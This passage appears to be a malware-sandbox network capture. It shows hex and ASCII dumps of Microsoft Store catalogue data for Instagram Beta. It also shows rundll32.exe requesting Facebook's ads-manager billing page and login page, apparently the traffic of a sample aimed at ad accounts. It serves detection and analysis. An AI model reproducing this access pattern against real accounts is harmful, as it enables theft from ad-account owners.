                                                                                                                                                                                    2023-01-05 07:59:12 UTC15323INData Raw: 5c 22 3a 5b 5c 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 39 2e 30 5f 6e 65 75 74 72 61 6c 5f 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 39 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 66 31 33 35 36 35 30 61 2d 30 64 30 31 2d 34 36 32 61 2d 61 30 39 61 2d 65 32 31 38 36 39 39 36 63 64 65 63 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61
                                                                                                                                                                                    Data Ascii: \":[\"Facebook.InstagramBeta_42.0.19.0_neutral__8xx8rvfyw5nnt\"],\"content.isMain\":false,\"content.packageId\":\"Facebook.InstagramBeta_42.0.19.0_neutral_~_8xx8rvfyw5nnt\",\"content.productId\":\"f135650a-0d01-462a-a09a-e2186996cdec\",\"content.targetPla
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15324INData Raw: 65 66 34 30 37 36 39 31 2d 31 34 30 63 2d 34 35 62 32 2d 39 64 38 64 2d 62 65 38 38 34 32 38 63 62 31 64 34 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 38 36 32 37 37 64 30 66 2d 38 35 34 37 2d 34 39 66 30 2d 62 39 64 32 2d 38 36 65 30 32 35 31 38 62 31 30 38 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53
                                                                                                                                                                                    Data Ascii: ef407691-140c-45b2-9d8d-be88428cb1d4","WuCategoryId":"86277d0f-8547-49f0-b9d2-86e02518b108","PackageFamilyName":"Facebook.InstagramBeta_8xx8rvfyw5nnt","SkuId":"0010","Content":null,"PackageFeatures":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuAS
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15325INData Raw: 72 74 69 65 73 22 3a 5b 5d 2c 22 49 6e 63 6c 75 73 69 6f 6e 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 5d 7d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 54 61 78 65 73 4e 6f 74 49 6e 63 6c 75 64 65 64 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 4f 72 69 67 69 6e 61 6c 52 65 6c 65 61 73 65 44 61 74 65 22 3a 22 32 30 31 36 2d 30 32 2d 32 36 54 31 39 3a 33 30 3a 34 39 2e 30 35 34 34 34 34 30 5a 22 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c
                                                                                                                                                                                    Data Ascii: rties":[],"InclusionProperties":[]},"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"TaxesNotIncluded","WholesaleCurrencyCode":""}},"Properties":{"OriginalReleaseDate":"2016-02-26T19:30:49.0544440Z"},"SkuId":"0010",
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15326INData Raw: 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 34 31 66 35 63 32 66 65 2d 33 64 61 63 2d 34 31 64 30 2d 61 36 64 32 2d 31 62 61 63 39 31 62 34 63 34 65 62 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 4e 42 4c 47 47 48 35 4c 39 58 54 3a 30 30 30 31 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 4e 42 4c 47 47 48 35 4c 39 58 54 3a 30 30 30 32 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 5d 7d 2c 22
                                                                                                                                                                                    Data Ascii: eyIds":["1"]},{"EntitlementKeys":["wes:App:41f5c2fe-3dac-41d0-a6d2-1bac91b4c4eb:Full"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["big:9NBLGGH5L9XT:0001"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["big:9NBLGGH5L9XT:0002"],"LicensingKeyIds":["1"]}]},"
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15327INData Raw: 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 43 6f 72 65 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 7d 2c 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 33 2d 30 38 54 31 39 3a 35 35 3a 34 31 2e 35 38 34 36 39 35 32 5a 22 2c 22 4c 69 63 65 6e 73 69 6e 67 44 61 74 61 22 3a 7b 22 53 61 74 69 73 66 79 69 6e 67 45 6e
                                                                                                                                                                                    Data Ascii: ersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Core"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1753-01-01T00:00:00.0000000Z"},"LastModifiedDate":"2022-03-08T19:55:41.5846952Z","LicensingData":{"SatisfyingEn
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15328INData Raw: 3a 5b 7b 22 53 6b 75 44 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 72 69 6e 67 69 6e 67 20 79 6f 75 20 63 6c 6f 73 65 72 20 74 6f 20 74 68 65 20 70 65 6f 70 6c 65 20 61 6e 64 20 74 68 69 6e 67 73 20 79 6f 75 20 6c 6f 76 65 2e 20 e2 80 93 20 49 6e 73 74 61 67 72 61 6d 20 66 72 6f 6d 20 4d 65 74 61 2e 5c 6e 5c 6e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 66 72 69 65 6e 64 73 2c 20 73 68 61 72 65 20 77 68 61 74 20 79 6f 75 27 72 65 20 75 70 20 74 6f 20 6f 72 20 73 65 65 20 77 68 61 74 27 73 20 6e 65 77 20 66 72 6f 6d 20 6f 74 68 65 72 73 20 61 6c 6c 20 6f 76 65 72 20 74 68 65 20 77 6f 72 6c 64 2e 20 45 78 70 6c 6f 72 65 20 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 20 77 68 65 72 65 20 79 6f 75 20 63 61 6e 20 66 65 65 6c 20 66 72 65 65 20 74 6f 20 62 65 20 79 6f 75
                                                                                                                                                                                    Data Ascii: :[{"SkuDescription":"Bringing you closer to the people and things you love. Instagram from Meta.\n\nConnect with friends, share what you're up to or see what's new from others all over the world. Explore our community where you can feel free to be you
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15329INData Raw: 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22 49 54 22 2c 22 4a 50 22 2c 22 4a 4f 22 2c 22 4b 5a 22 2c 22 4b 45 22 2c 22 4b 57 22 2c 22 4c 56 22 2c 22 4c 42 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4d 59 22 2c 22 4d 54 22 2c 22 4d 52 22 2c 22 4d 58 22 2c 22 4d 41 22 2c 22 4e 4c 22 2c 22 4e 5a 22 2c 22 4e 47 22 2c 22 4e 4f 22 2c 22 4f 4d 22 2c 22 50 4b 22 2c 22 50 45 22 2c 22 50 48 22 2c 22 50 4c 22 2c 22 50 54 22 2c 22 51 41 22 2c 22 52 4f 22 2c 22 52 55 22 2c 22 53 41 22 2c 22 52 53 22 2c 22 53 47 22 2c 22 53 4b 22 2c 22 53 49 22 2c 22 5a 41 22 2c 22 4b 52 22 2c 22 45 53 22 2c 22 53 45 22 2c 22 43 48 22 2c 22 54 57 22 2c 22 54 48 22 2c 22 54 54 22 2c 22 54 4e 22 2c 22 54 52 22 2c 22 55 41 22 2c 22 41 45 22 2c 22 47 42 22 2c 22 56
                                                                                                                                                                                    Data Ascii: D","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","V
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15330INData Raw: 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 38 36 32 37 37 64 30 66 2d 38 35 34 37 2d 34 39 66 30 2d 62 39 64 32 2d 38 36 65 30 32 35 31 38 62 31 30 38 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a
                                                                                                                                                                                    Data Ascii: SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH5L9XT","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH5L9XT","WuCategoryId":"86277d0f-8547-49f0-b9d2-86e02518b108","PackageFamilyName":"Facebook.InstagramBeta_8xx8rvfyw5nnt","SkuId":
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15331INData Raw: 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 62 75 6e 64 6c 65 64 50 61 63 6b 61 67 65 73 5c 22 3a 5b 5c 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 38 2e 30 5f 78 38 36 5f 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 38 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 66 31 33 35 36 35 30 61 2d 30 64 30
                                                                                                                                                                                    Data Ascii: rsion\":1688867040526336,\"content.bundledPackages\":[\"Facebook.InstagramBeta_42.0.18.0_x86__8xx8rvfyw5nnt\"],\"content.isMain\":false,\"content.packageId\":\"Facebook.InstagramBeta_42.0.18.0_neutral_~_8xx8rvfyw5nnt\",\"content.productId\":\"f135650a-0d0
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15332INData Raw: 2d 34 39 66 30 2d 62 39 64 32 2d 38 36 65 30 32 35 31 38 62 31 30 38 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 6e 65 75 74 72 61 6c 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 72 75 6e 46 75 6c 6c 54 72 75 73 74 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73
                                                                                                                                                                                    Data Ascii: -49f0-b9d2-86e02518b108","PackageFamilyName":"Facebook.InstagramBeta_8xx8rvfyw5nnt","SkuId":"0011","Content":null,"PackageFeatures":null}},{"Applications":[{"ApplicationId":"App"}],"Architectures":["neutral"],"Capabilities":["runFullTrust"],"ExperienceIds
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15333INData Raw: 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 39 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 66 31 33 35 36 35 30 61 2d 30 64 30 31 2d 34 36 32 61 2d 61 30 39 61 2d 65 32 31 38 36 39 39 36 63 64 65 63 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67
                                                                                                                                                                                    Data Ascii: Facebook.InstagramBeta_42.0.19.0_neutral_~_8xx8rvfyw5nnt\",\"content.productId\":\"f135650a-0d01-462a-a09a-e2186996cdec\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.targ
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15334INData Raw: 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 53 6b 75 54 79 70 65 22 3a 22 74 72 69 61 6c 22 2c 22 52 65 63 75 72 72 65 6e 63 65 50 6f 6c 69 63 79 22 3a 6e 75 6c 6c 7d 2c 22 41 76 61 69 6c 61 62 69 6c
                                                                                                                                                                                    Data Ascii: acebook.InstagramBeta_8xx8rvfyw5nnt","SkuId":"0011","Content":null,"PackageFeatures":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuUnifiedApp;3","SkuId":"0011","SkuType":"trial","RecurrencePolicy":null},"Availabil
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15335INData Raw: 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 51 50 48 32 32 31 35 50 37 48 37 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56
                                                                                                                                                                                    Data Ascii: nRequired":false},{"Actions":["License","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9QPH2215P7H7","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinV
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15336INData Raw: 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 4d 6f 62 69 6c 65 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 54 65 61 6d 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64
                                                                                                                                                                                    Data Ascii: 3647,"MinVersion":0,"PlatformName":"Windows.Mobile"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Team"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Xbox"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Wind


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    55192.168.2.449907157.240.20.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15337OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15338INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15339INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    56192.168.2.449910157.240.20.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15341OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15342INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri 